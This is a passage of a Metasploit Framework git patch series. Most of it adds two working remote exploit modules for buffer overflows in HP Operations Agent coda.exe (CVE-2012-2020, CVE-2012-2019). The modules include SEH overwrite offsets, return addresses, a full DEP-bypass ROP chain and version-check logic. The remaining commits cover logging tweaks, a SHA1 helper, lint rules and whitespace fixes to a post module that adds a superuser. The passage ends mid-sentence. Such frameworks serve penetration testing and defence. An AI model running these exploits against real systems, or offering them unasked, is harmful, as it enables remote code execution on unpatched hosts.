timed out" return elsif resp.code == 200 cred_hash = { @@ -62,9 +62,9 @@ class Metasploit3 < Msf::Auxiliary :active => true } report_auth_info(cred_hash) - print_good "Valid credential found: #{user}:#{pass}" + print_good "#{ip}:#{rport}: Valid credential found: #{user}:#{pass}" elsif resp.code == 401 - print_error "Login failed: #{user}:#{pass}" + print_error "#{ip}:#{rport}: Login failed: #{user}:#{pass}" else print_error "Recieved unexpected Response Code: #{resp.code}" end From 164321a5ed455368343770ec563d410d1ea1d0bd Mon Sep 17 00:00:00 2001 From: zombieCraig Date: Fri, 26 Oct 2012 11:56:14 -0400 Subject: [PATCH 57/74] Add Domain notes to smb_version --- modules/auxiliary/scanner/smb/smb_version.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/modules/auxiliary/scanner/smb/smb_version.rb b/modules/auxiliary/scanner/smb/smb_version.rb index e6b99f9dc7..fbb770395d 100644 --- a/modules/auxiliary/scanner/smb/smb_version.rb +++ b/modules/auxiliary/scanner/smb/smb_version.rb @@ -101,6 +101,8 @@ class Metasploit3 < Msf::Auxiliary conf[:os_sp] = res['sp'] if res['sp'] conf[:os_lang] = res['lang'] if res['os'] =~ /Windows/ + conf[:SMBName] = simple.client.default_name if simple.client.default_name + conf[:SMBDomain] = simple.client.default_domain if simple.client.default_domain report_note( :host => ip, From bcb80431d6a13ea57fdde30e5da13788b74da7d7 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sat, 27 Oct 2012 22:43:16 +0200 Subject: [PATCH 58/74] Added module for CVE-2012-2020 --- .../misc/hp_operations_agent_coda_8c.rb | 239 ++++++++++++++++++ 1 file changed, 239 insertions(+) create mode 100644 modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb new file mode 100644 index 0000000000..461e99b0e2 --- /dev/null +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb @@ -0,0 +1,239 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh + + def initialize + super( + 'Name' => 'HP Operations Agent Opcode 0x8c Buffer Overflow', + 'Description' => %q{ + This module exploits a buffer overflow vulnerability in HP Operations Agent for + Windows. The vulnerability exists in the HP Software Performance Core Program + component (coda.exe) when parsing requests for the 0x8c opcode. This module has + been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and + Windows 2003 SP2 (DEP bypass). + + The coda.exe components runs only for localhost by default, network access must be + granted through its configuration to be remotely exploitable. On the other hand it + runs on a random TCP port, to make easier reconnaissance a check function is + provided. + }, + 'Author' => [ + 'Luigi Auriemma', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'Platform' => 'win', + 'References' => + [ + [ 'CVE', '2012-2020' ], + [ 'OSVDB', '83674' ], + [ 'BID', '54362' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-115/' ] + ], + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "", + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment # add esp, -3500 + 'DisableNops' => true + }, + 'Targets' => + [ + [ 'HP Operations Agent 11.00 / Windows XP SP3', + { + 'Ret' => 0x100e79eb, # ppr from OvSecCore.dll + 'Offset' => 2084 + } + ], + [ 'HP Operations Agent 11.00 / Windows 2003 SP2', + { + 'Ret' => 0x10073c2c, # stackpivot # ADD ESP,404 # RETN from OvSecCore.dll + 'Offset' => 2084, + 'RopOffset' => 36 + } + ] + ], + 'DefaultTarget' => 1, + 'Privileged' => true, + 'DisclosureDate' => 'Jul 09 2012' + ) + + end + + def junk(n=4) + return rand_text_alpha(n).unpack("V")[0].to_i + end + + def nop + return make_nops(4).unpack("V")[0].to_i + end + + def check + + res = ping + + if not res + return Exploit::CheckCode::Unknown + end + + if res !~ /HTTP\/1\.1 200 OK/ + return Exploit::CheckCode::Unknown + end + + if res =~ /server:.*coda 11.(\d+)/ + minor = $1.to_i + if minor < 2 + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + end + + if res =~ /server:.*coda/ + return Exploit::CheckCode::Detected + end + + return Exploit::CheckCode::Safe + + end + + def ping + + ping_request = <<-eos +Ping /Hewlett-Packard/OpenView/BBC/ping/ HTTP/1.1 +cache-control: no-cache +connection: close +content-length: 0 +content-type: application/octetstream +date: Tue, 16 Oct 2012 20:30:17 GMT +host: #{rhost}:#{rport} +pragma: no-cache +senderid: 2d2e1d02-032f-7561-148f-fcc87e48a956 +targetid: unknown +targeturi: http://#{rhost}:#{rport}/Hewlett-Packard/OpenView/BBC/ping/ +user-agent: BBC 11.00.044; coda unknown version + + eos + + connect + sock.put(ping_request) + res = sock.get_once(-1, 1) + disconnect + + return res + + end + + def exploit + + peer = "#{rhost}:#{rport}" + + print_status "#{peer} - Ping host..." + res = ping + if not res or res !~ /HTTP\/1\.1 200 OK/ or res !~ /server:.*coda/ + print_error("#{peer} - Host didn't answer correctly to ping") + return + end + + connect + + http_headers = <<-eos +GET /Hewlett-Packard/OpenView/Coda/ HTTP/1.1 +cache-control: no-cache +content-type: application/octetstream +date: Tue, 16 Oct 2012 20:30:29 GMT +expect: 100-continue +host: #{rhost}:#{rport} +pragma: no-cache +senderid: 2d2e1d02-032f-7561-148f-fcc87e48a956 +targetid: unknown +targeturi: http://[#{rhost}]:#{rport}/Hewlett-Packard/OpenView/Coda/ +transfer-encoding: chunked +user-agent: BBC 11.00.044; 14 + + eos + + print_status("#{peer} - Sending HTTP Expect...") + sock.put(http_headers) + res = sock.get_once(-1, 1) + if not res or res !~ /HTTP\/1\.1 100 Continue/ + print_error("#{peer} - Failed while sending HTTP Expect Header") + return + end + + coda_request = [ + 0x0000000e, + 0xffffffff, + 0x00000000, + 0x0000008c, # Operation 0x8c + 0x00000002, + 0x00000002 + ].pack("N*") + + if target.name =~ /Windows XP/ + bof = rand_text(target['Offset']) + bof << generate_seh_record(target.ret) + bof << payload.encoded + bof << rand_text(4000) # Allows to trigger exception + else # Windows 2003 + rop_gadgets = + [ + 0x77bb2563, # POP EAX # RETN + 0x77ba1114, # <- *&VirtualProtect() + 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN + junk, + 0x77bb0c86, # XCHG EAX,ESI # RETN + 0x77bc9801, # POP EBP # RETN + 0x77be2265, # ptr to 'push esp # ret' + 0x77bb2563, # POP EAX # RETN + 0x03C0990F, + 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx) + 0x77bb48d3, # POP EBX, RET + 0x77bf21e0, # .data + 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN + 0x77bbfc02, # POP ECX # RETN + 0x77bef001, # W pointer (lpOldProtect) (-> ecx) + 0x77bd8c04, # POP EDI # RETN + 0x77bd8c05, # ROP NOP (-> edi) + 0x77bb2563, # POP EAX # RETN + 0x03c0984f, + 0x77bdd441, # SUB EAX, 03c0940f + 0x77bb8285, # XCHG EAX,EDX # RETN + 0x77bb2563, # POP EAX # RETN + nop, + 0x77be6591, # PUSHAD # ADD AL,0EF # RETN + ].pack("V*") + bof = Rex::Text.pattern_create(target['RopOffset']) + bof << rop_gadgets + bof << payload.encoded + my_payload_length = target['RopOffset'] + rop_gadgets.length + payload.encoded.length + bof << rand_text(target['Offset'] - my_payload_length) + bof << generate_seh_record(target.ret) + bof << rand_text(4000) # Allows to trigger exception + end + + coda_request << [bof.length].pack("n") + coda_request << bof + + http_body = coda_request.length.to_s(16) + http_body << "\x0d\x0a" + http_body << coda_request + http_body << "\x0d\x0a\x0d\x0a" + + print_status("#{peer} - Triggering overflow...") + sock.put(http_body) + + disconnect + end + +end From 51bc8060142294485a4908e20cd96de3ce7098c6 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sat, 27 Oct 2012 22:45:37 +0200 Subject: [PATCH 59/74] Added module for CVE-2012-2019 --- .../misc/hp_operations_agent_coda_34.rb | 239 ++++++++++++++++++ 1 file changed, 239 insertions(+) create mode 100644 modules/exploits/windows/misc/hp_operations_agent_coda_34.rb diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb new file mode 100644 index 0000000000..171971c237 --- /dev/null +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb @@ -0,0 +1,239 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh + + def initialize + super( + 'Name' => 'HP Operations Agent Opcode 0x8c Buffer Overflow', + 'Description' => %q{ + This module exploits a buffer overflow vulnerability in HP Operations Agent for + Windows. The vulnerability exists in the HP Software Performance Core Program + component (coda.exe) when parsing requests for the 0x34 opcode. This module has + been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and + Windows 2003 SP2 (DEP bypass). + + The coda.exe components runs only for localhost by default, network access must be + granted through its configuration to be remotely exploitable. On the other hand it + runs on a random TCP port, to make easier reconnaissance a check function is + provided. + }, + 'Author' => [ + 'Luigi Auriemma', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'Platform' => 'win', + 'References' => + [ + [ 'CVE', '2012-2019' ], + [ 'OSVDB', '83673' ], + [ 'BID', '54362' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-114/' ] + ], + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "", + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment # add esp, -3500 + 'DisableNops' => true + }, + 'Targets' => + [ + [ 'HP Operations Agent 11.00 / Windows XP SP3', + { + 'Ret' => 0x100e79eb, # ppr from OvSecCore.dll + 'Offset' => 2084 + } + ], + [ 'HP Operations Agent 11.00 / Windows 2003 SP2', + { + 'Ret' => 0x10073c2c, # stackpivot # ADD ESP,404 # RETN from OvSecCore.dll + 'Offset' => 2084, + 'RopOffset' => 36 + } + ] + ], + 'DefaultTarget' => 1, + 'Privileged' => true, + 'DisclosureDate' => 'Jul 09 2012' + ) + + end + + def junk(n=4) + return rand_text_alpha(n).unpack("V")[0].to_i + end + + def nop + return make_nops(4).unpack("V")[0].to_i + end + + def check + + res = ping + + if not res + return Exploit::CheckCode::Unknown + end + + if res !~ /HTTP\/1\.1 200 OK/ + return Exploit::CheckCode::Unknown + end + + if res =~ /server:.*coda 11.(\d+)/ + minor = $1.to_i + if minor < 2 + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + end + + if res =~ /server:.*coda/ + return Exploit::CheckCode::Detected + end + + return Exploit::CheckCode::Safe + + end + + def ping + + ping_request = <<-eos +Ping /Hewlett-Packard/OpenView/BBC/ping/ HTTP/1.1 +cache-control: no-cache +connection: close +content-length: 0 +content-type: application/octetstream +date: Tue, 16 Oct 2012 20:30:17 GMT +host: #{rhost}:#{rport} +pragma: no-cache +senderid: 2d2e1d02-032f-7561-148f-fcc87e48a956 +targetid: unknown +targeturi: http://#{rhost}:#{rport}/Hewlett-Packard/OpenView/BBC/ping/ +user-agent: BBC 11.00.044; coda unknown version + + eos + + connect + sock.put(ping_request) + res = sock.get_once(-1, 1) + disconnect + + return res + + end + + def exploit + + peer = "#{rhost}:#{rport}" + + print_status "#{peer} - Ping host..." + res = ping + if not res or res !~ /HTTP\/1\.1 200 OK/ or res !~ /server:.*coda/ + print_error("#{peer} - Host didn't answer correctly to ping") + return + end + + connect + + http_headers = <<-eos +GET /Hewlett-Packard/OpenView/Coda/ HTTP/1.1 +cache-control: no-cache +content-type: application/octetstream +date: Tue, 16 Oct 2012 20:30:29 GMT +expect: 100-continue +host: #{rhost}:#{rport} +pragma: no-cache +senderid: 2d2e1d02-032f-7561-148f-fcc87e48a956 +targetid: unknown +targeturi: http://[#{rhost}]:#{rport}/Hewlett-Packard/OpenView/Coda/ +transfer-encoding: chunked +user-agent: BBC 11.00.044; 14 + + eos + + print_status("#{peer} - Sending HTTP Expect...") + sock.put(http_headers) + res = sock.get_once(-1, 1) + if not res or res !~ /HTTP\/1\.1 100 Continue/ + print_error("#{peer} - Failed while sending HTTP Expect Header") + return + end + + coda_request = [ + 0x0000000e, + 0xffffffff, + 0x00000000, + 0x00000034, # Operation 0x8c + 0x00000002, + 0x00000002 + ].pack("N*") + + if target.name =~ /Windows XP/ + bof = rand_text(target['Offset']) + bof << generate_seh_record(target.ret) + bof << payload.encoded + bof << rand_text(4000) # Allows to trigger exception + else # Windows 2003 + rop_gadgets = + [ + 0x77bb2563, # POP EAX # RETN + 0x77ba1114, # <- *&VirtualProtect() + 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN + junk, + 0x77bb0c86, # XCHG EAX,ESI # RETN + 0x77bc9801, # POP EBP # RETN + 0x77be2265, # ptr to 'push esp # ret' + 0x77bb2563, # POP EAX # RETN + 0x03C0990F, + 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx) + 0x77bb48d3, # POP EBX, RET + 0x77bf21e0, # .data + 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN + 0x77bbfc02, # POP ECX # RETN + 0x77bef001, # W pointer (lpOldProtect) (-> ecx) + 0x77bd8c04, # POP EDI # RETN + 0x77bd8c05, # ROP NOP (-> edi) + 0x77bb2563, # POP EAX # RETN + 0x03c0984f, + 0x77bdd441, # SUB EAX, 03c0940f + 0x77bb8285, # XCHG EAX,EDX # RETN + 0x77bb2563, # POP EAX # RETN + nop, + 0x77be6591, # PUSHAD # ADD AL,0EF # RETN + ].pack("V*") + bof = Rex::Text.pattern_create(target['RopOffset']) + bof << rop_gadgets + bof << payload.encoded + my_payload_length = target['RopOffset'] + rop_gadgets.length + payload.encoded.length + bof << rand_text(target['Offset'] - my_payload_length) + bof << generate_seh_record(target.ret) + bof << rand_text(4000) # Allows to trigger exception + end + + coda_request << [bof.length].pack("n") + coda_request << bof + + http_body = coda_request.length.to_s(16) + http_body << "\x0d\x0a" + http_body << coda_request + http_body << "\x0d\x0a\x0d\x0a" + + print_status("#{peer} - Triggering overflow...") + sock.put(http_body) + + disconnect + end + +end \ No newline at end of file From 3efa4186df07d6a5d4b9f8bd367723905e062f42 Mon Sep 17 00:00:00 2001 From: scriptjunkie Date: Sat, 27 Oct 2012 16:15:04 -0500 Subject: [PATCH 60/74] Fix search error when platform not in target name --- lib/msf/core/db_manager.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index 52bbafa7de..0f68a03c21 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -588,8 +588,8 @@ class DBManager where_v << [ xv, xv ] when 'os','platform' xv = "%#{kv}%" - where_q << ' ( module_targets.name ILIKE ? ) ' - where_v << [ xv ] + where_q << ' ( module_platforms.name ILIKE ? OR module_targets.name ILIKE ? ) ' + where_v << [ xv, xv ] when 'port' # TODO when 'type' From b4b1b77a775d6e4654f040b6c320de1a978cbb7e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 28 Oct 2012 00:51:18 +0200 Subject: [PATCH 61/74] deleted unnecessary http headers according to my tests --- modules/exploits/windows/misc/hp_operations_agent_coda_34.rb | 4 ---- 1 file changed, 4 deletions(-) diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb index 171971c237..2b3c46e0e1 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb @@ -115,10 +115,8 @@ cache-control: no-cache connection: close content-length: 0 content-type: application/octetstream -date: Tue, 16 Oct 2012 20:30:17 GMT host: #{rhost}:#{rport} pragma: no-cache -senderid: 2d2e1d02-032f-7561-148f-fcc87e48a956 targetid: unknown targeturi: http://#{rhost}:#{rport}/Hewlett-Packard/OpenView/BBC/ping/ user-agent: BBC 11.00.044; coda unknown version @@ -151,11 +149,9 @@ user-agent: BBC 11.00.044; coda unknown version GET /Hewlett-Packard/OpenView/Coda/ HTTP/1.1 cache-control: no-cache content-type: application/octetstream -date: Tue, 16 Oct 2012 20:30:29 GMT expect: 100-continue host: #{rhost}:#{rport} pragma: no-cache -senderid: 2d2e1d02-032f-7561-148f-fcc87e48a956 targetid: unknown targeturi: http://[#{rhost}]:#{rport}/Hewlett-Packard/OpenView/Coda/ transfer-encoding: chunked From 73deeacd7e9e4e0b18876310cd9a9e410cfb754a Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 28 Oct 2012 00:52:52 +0200 Subject: [PATCH 62/74] deleted unnecessary http headers according to my tests --- modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb | 4 ---- 1 file changed, 4 deletions(-) diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb index 461e99b0e2..cf94b68377 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb @@ -115,10 +115,8 @@ cache-control: no-cache connection: close content-length: 0 content-type: application/octetstream -date: Tue, 16 Oct 2012 20:30:17 GMT host: #{rhost}:#{rport} pragma: no-cache -senderid: 2d2e1d02-032f-7561-148f-fcc87e48a956 targetid: unknown targeturi: http://#{rhost}:#{rport}/Hewlett-Packard/OpenView/BBC/ping/ user-agent: BBC 11.00.044; coda unknown version @@ -151,11 +149,9 @@ user-agent: BBC 11.00.044; coda unknown version GET /Hewlett-Packard/OpenView/Coda/ HTTP/1.1 cache-control: no-cache content-type: application/octetstream -date: Tue, 16 Oct 2012 20:30:29 GMT expect: 100-continue host: #{rhost}:#{rport} pragma: no-cache -senderid: 2d2e1d02-032f-7561-148f-fcc87e48a956 targetid: unknown targeturi: http://[#{rhost}]:#{rport}/Hewlett-Packard/OpenView/Coda/ transfer-encoding: chunked From 19920b3275b68c970a33fb173baffd95d675dd12 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 28 Oct 2012 02:38:39 +0100 Subject: [PATCH 63/74] update module titles for hp operation agent vulns --- modules/exploits/windows/misc/hp_operations_agent_coda_34.rb | 2 +- modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb index 2b3c46e0e1..f87c4615e9 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb @@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize super( - 'Name' => 'HP Operations Agent Opcode 0x8c Buffer Overflow', + 'Name' => 'HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow vulnerability in HP Operations Agent for Windows. The vulnerability exists in the HP Software Performance Core Program diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb index cf94b68377..152836b2e4 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb @@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize super( - 'Name' => 'HP Operations Agent Opcode 0x8c Buffer Overflow', + 'Name' => 'HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow vulnerability in HP Operations Agent for Windows. The vulnerability exists in the HP Software Performance Core Program From 6ec392c4cf79b402347709ba3ed8dd7e98963e89 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sun, 28 Oct 2012 23:49:21 -0500 Subject: [PATCH 64/74] Add Rex::Text.sha1 and Rex::Text.sha1_raw --- lib/rex/text.rb | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/lib/rex/text.rb b/lib/rex/text.rb index 1ce4943202..bccc7c9f96 100644 --- a/lib/rex/text.rb +++ b/lib/rex/text.rb @@ -1,5 +1,6 @@ # -*- coding: binary -*- require 'digest/md5' +require 'digest/sha1' require 'stringio' begin @@ -812,6 +813,20 @@ module Text Digest::MD5.hexdigest(str) end + # + # Raw SHA1 digest of the supplied string + # + def self.sha1_raw(str) + Digest::SHA1.digest(str) + end + + # + # Hexidecimal SHA1 digest of the supplied string + # + def self.sha1(str) + Digest::SHA1.hexdigest(str) + end + # # Convert hex-encoded characters to literals. # Example: "AA\\x42CC" becomes "AABCC" From ac90d217259bc3aeb91e4029b126a2b268c67230 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 29 Oct 2012 08:27:22 -0500 Subject: [PATCH 65/74] Msftidy checks for file loads --- tools/msftidy.rb | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/tools/msftidy.rb b/tools/msftidy.rb index cdcf95aea8..505fb15855 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -208,6 +208,11 @@ class Msftidy end end + # if ln =~/^[ \t]+load[ \t]+.*?\.rb/ + if ln =~/^[ \t]*load[ \t]+[\x22\x27]/ + error("Loading (not requiring) a file: #{ln.inspect}", idx) + end + # The rest of these only count if it's not a comment line next if ln =~ /[[:space:]]*#/ From bd0352de1993b339ad9c6aeccf730ed5817c773a Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 29 Oct 2012 08:33:01 -0500 Subject: [PATCH 66/74] Delete comment --- tools/msftidy.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/tools/msftidy.rb b/tools/msftidy.rb index 505fb15855..e630ea2c8b 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -208,7 +208,6 @@ class Msftidy end end - # if ln =~/^[ \t]+load[ \t]+.*?\.rb/ if ln =~/^[ \t]*load[ \t]+[\x22\x27]/ error("Loading (not requiring) a file: #{ln.inspect}", idx) end From 0e3bc7d060d405766274ef30ba77bac223fc4b72 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 29 Oct 2012 15:45:40 +0100 Subject: [PATCH 67/74] hp operations agent mods: fix use of pattern_create, use ropdb --- .../misc/hp_operations_agent_coda_34.rb | 36 +++---------------- .../misc/hp_operations_agent_coda_8c.rb | 36 +++---------------- 2 files changed, 10 insertions(+), 62 deletions(-) diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb index f87c4615e9..b0bbfffef4 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb @@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh + include Msf::Exploit::RopDb def initialize super( @@ -182,37 +183,10 @@ user-agent: BBC 11.00.044; 14 bof << payload.encoded bof << rand_text(4000) # Allows to trigger exception else # Windows 2003 - rop_gadgets = - [ - 0x77bb2563, # POP EAX # RETN - 0x77ba1114, # <- *&VirtualProtect() - 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN - junk, - 0x77bb0c86, # XCHG EAX,ESI # RETN - 0x77bc9801, # POP EBP # RETN - 0x77be2265, # ptr to 'push esp # ret' - 0x77bb2563, # POP EAX # RETN - 0x03C0990F, - 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx) - 0x77bb48d3, # POP EBX, RET - 0x77bf21e0, # .data - 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN - 0x77bbfc02, # POP ECX # RETN - 0x77bef001, # W pointer (lpOldProtect) (-> ecx) - 0x77bd8c04, # POP EDI # RETN - 0x77bd8c05, # ROP NOP (-> edi) - 0x77bb2563, # POP EAX # RETN - 0x03c0984f, - 0x77bdd441, # SUB EAX, 03c0940f - 0x77bb8285, # XCHG EAX,EDX # RETN - 0x77bb2563, # POP EAX # RETN - nop, - 0x77be6591, # PUSHAD # ADD AL,0EF # RETN - ].pack("V*") - bof = Rex::Text.pattern_create(target['RopOffset']) - bof << rop_gadgets - bof << payload.encoded - my_payload_length = target['RopOffset'] + rop_gadgets.length + payload.encoded.length + rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'2003'}) + bof = rand_text(target['RopOffset']) + bof << rop_payload + my_payload_length = target['RopOffset'] + rop_payload.length bof << rand_text(target['Offset'] - my_payload_length) bof << generate_seh_record(target.ret) bof << rand_text(4000) # Allows to trigger exception diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb index 152836b2e4..23160eb4e0 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb @@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh + include Msf::Exploit::RopDb def initialize super( @@ -182,37 +183,10 @@ user-agent: BBC 11.00.044; 14 bof << payload.encoded bof << rand_text(4000) # Allows to trigger exception else # Windows 2003 - rop_gadgets = - [ - 0x77bb2563, # POP EAX # RETN - 0x77ba1114, # <- *&VirtualProtect() - 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN - junk, - 0x77bb0c86, # XCHG EAX,ESI # RETN - 0x77bc9801, # POP EBP # RETN - 0x77be2265, # ptr to 'push esp # ret' - 0x77bb2563, # POP EAX # RETN - 0x03C0990F, - 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx) - 0x77bb48d3, # POP EBX, RET - 0x77bf21e0, # .data - 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN - 0x77bbfc02, # POP ECX # RETN - 0x77bef001, # W pointer (lpOldProtect) (-> ecx) - 0x77bd8c04, # POP EDI # RETN - 0x77bd8c05, # ROP NOP (-> edi) - 0x77bb2563, # POP EAX # RETN - 0x03c0984f, - 0x77bdd441, # SUB EAX, 03c0940f - 0x77bb8285, # XCHG EAX,EDX # RETN - 0x77bb2563, # POP EAX # RETN - nop, - 0x77be6591, # PUSHAD # ADD AL,0EF # RETN - ].pack("V*") - bof = Rex::Text.pattern_create(target['RopOffset']) - bof << rop_gadgets - bof << payload.encoded - my_payload_length = target['RopOffset'] + rop_gadgets.length + payload.encoded.length + rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'2003'}) + bof = rand_text(target['RopOffset']) + bof << rop_payload + my_payload_length = target['RopOffset'] + rop_payload.length bof << rand_text(target['Offset'] - my_payload_length) bof << generate_seh_record(target.ret) bof << rand_text(4000) # Allows to trigger exception From 5e80e19a4ec59f26f8d0c2c963a665b9b8d2e2f5 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 29 Oct 2012 11:08:03 -0500 Subject: [PATCH 68/74] Msftidy complaint about EOL spaces --- modules/post/multi/escalate/metasploit_pcaplog.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 64cdea7f19..3ce5ff4189 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Post 'References' => [ [ 'BID', '54472' ], - [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'], + [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'], [ 'URL', 'https://community.rapid7.com/docs/DOC-1946' ], ], 'DisclosureDate' => "Jul 16 2012", @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post } )) register_options( - [ + [ Opt::RPORT(2940), OptString.new("USERNAME", [ true, "Username for the new superuser", "metasploit" ]), OptString.new("PASSWORD", [ true, "Password for the new superuser", "metasploit" ]), @@ -98,13 +98,13 @@ class Metasploit3 < Msf::Post i = (i+1) % 60 # increment second counter end - if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") + if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account") # TODO: Consider recording our now-created username and password as a valid credential here. else - print_error("Failed, the '" + datastore['USERNAME'] + "' user does not appear to have been added") - end + print_error("Failed, the '" + datastore['USERNAME'] + "' user does not appear to have been added") + end # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload - # However beceause the session is not a terminal, su will not always allow this. + # However beceause the session is not a terminal, su will not always allow this. end end From 65e27ff38a614459b31fcacd7540c26aa06ec5da Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 29 Oct 2012 11:22:06 -0500 Subject: [PATCH 69/74] Warn about the potential to jack up /etc/passwd This needs to be underlined. It's too easy to wang up 